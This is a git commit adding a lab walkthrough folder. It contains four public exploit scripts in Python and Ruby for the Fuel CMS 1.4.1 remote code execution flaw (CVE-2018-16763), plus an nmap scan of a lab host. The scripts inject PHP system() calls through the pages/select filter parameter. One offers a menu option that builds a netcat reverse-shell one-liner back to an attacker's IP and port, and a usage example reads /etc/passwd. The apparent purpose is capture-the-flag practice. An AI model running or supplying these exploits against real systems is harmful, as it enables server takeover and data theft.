initial commit

2025-12-04 09:57:17 +01:00
commit 0054cc02b1
4851 changed files with 4416257 additions and 0 deletions
--- a/Walkthroughs/VulnerabilityCapstone/argparse
+++ b/Walkthroughs/VulnerabilityCapstone/argparse
--- a/Walkthroughs/VulnerabilityCapstone/exploit.py
+++ b/Walkthroughs/VulnerabilityCapstone/exploit.py
@@ -0,0 +1,129 @@
+#!/usr/bin/python3
+
+# Exploit Title: fuelCMS 1.4.1 - Remote Code Execution
+# Date: 2019-07-19
+# Exploit Author: 0xd0ff9
+# Vendor Homepage: https://www.getfuelcms.com/
+# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
+# Version: <= 1.4.1
+# Tested on: Ubuntu - Apache2 - php5
+# CVE : CVE-2018-16763
+# 
+# Poc Created by Ac1d (assassin) 
+
+
+
+import requests
+import sys
+import urllib
+
+from requests.sessions import extract_cookies_to_jar
+
+class col:
+    HEADER = '\033[95m'
+    BLUE = '\033[94m'
+    CYAN = '\033[96m'
+    GREEN = '\033[92m'
+    WARNING = '\033[93m'
+    FAIL = '\033[91m'
+    RESET = '\033[0m'
+    BLACK = "\033[0;30m"
+    RED = "\033[0;31m"
+    GREEN = "\033[0;32m"
+    BROWN = "\033[0;33m"
+    BLUE = "\033[0;34m"
+    PURPLE = "\033[0;35m"
+    LIGHT_GRAY = "\033[0;37m"
+    DARK_GRAY = "\033[1;30m"
+    LIGHT_RED = "\033[1;31m"
+    LIGHT_GREEN = "\033[1;32m"
+    YELLOW = "\033[1;33m"
+    LIGHT_BLUE = "\033[1;34m"
+    LIGHT_PURPLE = "\033[1;35m"
+    LIGHT_CYAN = "\033[1;36m"
+    LIGHT_WHITE = "\033[1;37m"
+    BOLD = "\033[1m"
+    FAINT = "\033[2m"
+    ITALIC = "\033[3m"
+    UNDERLINE = "\033[4m"
+    BLINK = "\033[5m"
+    NEGATIVE = "\033[7m"
+    CROSSED = "\033[9m"
+
+
+def banner():
+    banner = r"""
+ ______         _ _____ ___  ___ _____ 
+|  ___|        | /  __ \|  \/  |/  ___|
+| |_ _   _  ___| | /  \/| .  . |\ `--. 
+|  _| | | |/ _ \ | |    | |\/| | `--. \
+| | | |_| |  __/ | \__/\| |  | |/\__/ /
+\_|  \__,_|\___|_|\____/\_|  |_/\____/ 
+Tested on 1.4                                       
+"""
+    banner += "Created by Ac1d"
+    return col.LIGHT_BLUE + banner + col.RESET
+
+
+def help():
+    banner = col.LIGHT_WHITE + "\n\tMenu\n"
+    banner += col.LIGHT_GREEN
+    banner += "\nexit     -\tExit app"
+    banner += "\nshell_me -\tGet a reverse shell (netcat) "
+    banner += "\nhelp     -\tShow this help\n"+ col.RESET
+    return banner
+    
+
+
+print(banner())
+print(help())
+
+#http://10.10.12.27/fuel/pages/select/?filter=%27%2Bpi(print(%24a%3D%27system%27))%2B%24a(%27ls%20-la%27)%2B%27
+
+if len(sys.argv) != 2:
+    print("\nUsage: python3 exploit.py Vulnerable IPADDRESS")
+    sys.exit(0)
+
+IP=sys.argv[1]
+
+def parsePage(page):
+    try:            
+        page = page.split("<h4>A PHP Error was encountered</h4>")[0]
+        page = page.split("<div")[0]
+        page = page[6:]
+        return page
+    except:
+        return False
+
+try:
+        
+    while True:
+        cmd = input(col.LIGHT_WHITE +"fuelCMS$ " + col.RESET)
+
+        if cmd[0:4].lower() == "exit":
+            print(col.RED + "Exiting..." + col.RESET)
+            sys.exit(0)
+
+        if cmd[0:8] == "shell_me":
+            IP2, PORT = input(col.LIGHT_BLUE + "Enter your attacking machine IP:PORT $ " + col.RESET).split(":")
+            nc = f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {IP2} {PORT} >/tmp/f"
+            cmd = nc
+            print(col.LIGHT_GREEN + "\nHope you had your listener ready!!" + col.RESET)
+            
+        if cmd[0:4] == "help":
+            print(help())
+            continue
+        
+        if not "/tmp/f;mkfifo" in cmd:
+            print(col.LIGHT_GRAY + "Sending request." + col.RESET)
+        cmd = urllib.parse.quote(cmd)
+        r = requests.get(f"http://{IP}/fuel/pages/select/?filter=%27%2Bpi(print(%24a%3D%27system%27))%2B%24a(%27"+ cmd +"%27)%2B%27")
+        if r.status_code == 200:
+            page = parsePage(r.text)
+            if page == "\n":
+                print(col.RED + "No result" + col.RESET)
+                continue
+            print(col.LIGHT_GREEN+ f"\n{page.strip()}" + col.RESET)
+
+except Exception as e:
+    print(col.RED + f"An error occured, please try again...\n\n{e}" + col.RESET)
--- a/Walkthroughs/VulnerabilityCapstone/exploit.rb
+++ b/Walkthroughs/VulnerabilityCapstone/exploit.rb
@@ -0,0 +1,51 @@
+# Title: Fuel CMS 1.4.1 - Remote Code Execution (2)
+# Exploit Author: Alexandre ZANNI
+# Date: 2020-11-14
+# Vendor Homepage: https://www.getfuelcms.com/
+# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
+# Version: <= 1.4.1
+# Tested on: Ubuntu 16.04
+# CVE : CVE-2018-16763
+# References: https://www.exploit-db.com/exploits/47138
+
+#!/usr/bin/env ruby
+
+require 'httpclient'
+require 'docopt'
+
+# dirty workaround to ignore Max-Age
+# https://github.com/nahi/httpclient/issues/242#issuecomment-69013932
+$VERBOSE = nil
+
+doc = <<~DOCOPT
+  Fuel CMS 1.4 - Remote Code Execution
+
+  Usage:
+    #{__FILE__} <url> <cmd>
+    #{__FILE__} -h | --help
+
+  Options:
+    <url>         Root URL (base path) including HTTP scheme, port and root folder
+    <cmd>         The system command to execute
+    -h, --help    Show this screen
+
+  Examples:
+    #{__FILE__} http://example.org id
+    #{__FILE__} https://example.org:8443/fuelcms 'cat /etc/passwd'
+DOCOPT
+
+def exploit(client, root_url, cmd)
+  url = root_url + "/fuel/pages/select/?filter='%2Bpi(print(%24a%3D'system'))%2B%24a('#{cmd}')%2B'"
+
+  res = client.get(url)
+
+  /system(.+?)<div/mx.match(res.body).captures[0].chomp
+end
+
+begin
+  args = Docopt.docopt(doc)
+  clnt = HTTPClient.new
+  puts exploit(clnt, args['<url>'], args['<cmd>'])
+rescue Docopt::Exit => e
+  puts e.message
+end
--- a/Walkthroughs/VulnerabilityCapstone/exploit1.py
+++ b/Walkthroughs/VulnerabilityCapstone/exploit1.py
@@ -0,0 +1,34 @@
+# Exploit Title: fuel CMS 1.4.1 - Remote Code Execution (1)
+# Date: 2019-07-19
+# Exploit Author: 0xd0ff9
+# Vendor Homepage: https://www.getfuelcms.com/
+# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
+# Version: <= 1.4.1
+# Tested on: Ubuntu - Apache2 - php5
+# CVE : CVE-2018-16763
+
+
+import requests
+import urllib
+
+url = "http://10.10.225.250"
+def find_nth_overlapping(haystack, needle, n):
+    start = haystack.find(needle)
+    while start >= 0 and n > 1:
+        start = haystack.find(needle, start+1)
+        n -= 1
+    return start
+
+while 1:
+	xxxx = raw_input('cmd:')
+	burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"
+	proxy = {"http":"http://127.0.0.1:8080"}
+	r = requests.get(burp0_url, proxies=proxy)
+
+	html = "<!DOCTYPE html>"
+	htmlcharset = r.text.find(html)
+
+	begin = r.text[0:20]
+	dup = find_nth_overlapping(r.text,begin,2)
+
+	print r.text[0:dup]
--- a/Walkthroughs/VulnerabilityCapstone/exploit2.py
+++ b/Walkthroughs/VulnerabilityCapstone/exploit2.py
@@ -0,0 +1,63 @@
+# Exploit Title: Fuel CMS 1.4.1 - Remote Code Execution (3)
+# Exploit Author: Padsala Trushal
+# Date: 2021-11-03
+# Vendor Homepage: https://www.getfuelcms.com/
+# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
+# Version: <= 1.4.1
+# Tested on: Ubuntu - Apache2 - php5
+# CVE : CVE-2018-16763
+
+#!/usr/bin/python3
+
+import requests
+from urllib.parse import quote
+import argparse
+import sys
+from colorama import Fore, Style
+
+def get_arguments():
+	parser = argparse.ArgumentParser(description='fuel cms fuel CMS 1.4.1 - Remote Code Execution Exploit',usage=f'python3 {sys.argv[0]} -u <url>',epilog=f'EXAMPLE - python3 {sys.argv[0]} -u http://10.10.21.74')
+
+	parser.add_argument('-v','--version',action='version',version='1.2',help='show the version of exploit')
+
+	parser.add_argument('-u','--url',metavar='url',dest='url',help='Enter the url')
+
+	args = parser.parse_args()
+
+	if len(sys.argv) <=2:
+		parser.print_usage()
+		sys.exit()
+
+	return args
+
+
+args = get_arguments()
+url = args.url
+
+if "http" not in url:
+	sys.stderr.write("Enter vaild url")
+	sys.exit()
+
+try:
+   r = requests.get(url)
+   if r.status_code == 200:
+       print(Style.BRIGHT+Fore.GREEN+"[+]Connecting..."+Style.RESET_ALL)
+
+
+except requests.ConnectionError:
+    print(Style.BRIGHT+Fore.RED+"Can't connect to url"+Style.RESET_ALL)
+    sys.exit()
+
+while True:
+	cmd = input(Style.BRIGHT+Fore.YELLOW+"Enter Command $"+Style.RESET_ALL)
+
+	main_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+quote(cmd)+"%27%29%2b%27"
+
+	r = requests.get(main_url)
+
+	#<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">
+
+	output = r.text.split('<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">')
+	print(output[0])
+	if cmd == "exit":
+		break
--- a/Walkthroughs/VulnerabilityCapstone/requests
+++ b/Walkthroughs/VulnerabilityCapstone/requests
--- a/Walkthroughs/VulnerabilityCapstone/scan1.gnmap
+++ b/Walkthroughs/VulnerabilityCapstone/scan1.gnmap
@@ -0,0 +1,4 @@
+# Nmap 7.95 scan initiated Sun Oct 12 15:59:04 2025 as: /usr/lib/nmap/nmap --privileged -A -T4 -oG scan1.gnmap 10.10.225.250
+Host: 10.10.225.250 ()	Status: Up
+Host: 10.10.225.250 ()	Ports: 22/open/tcp//ssh//OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.4.41 ((Ubuntu))/	Ignored State: closed (998)	OS: Linux 4.15	Seq Index: 264	IP ID Seq: All zeros
+# Nmap done at Sun Oct 12 15:59:19 2025 -- 1 IP address (1 host up) scanned in 14.79 seconds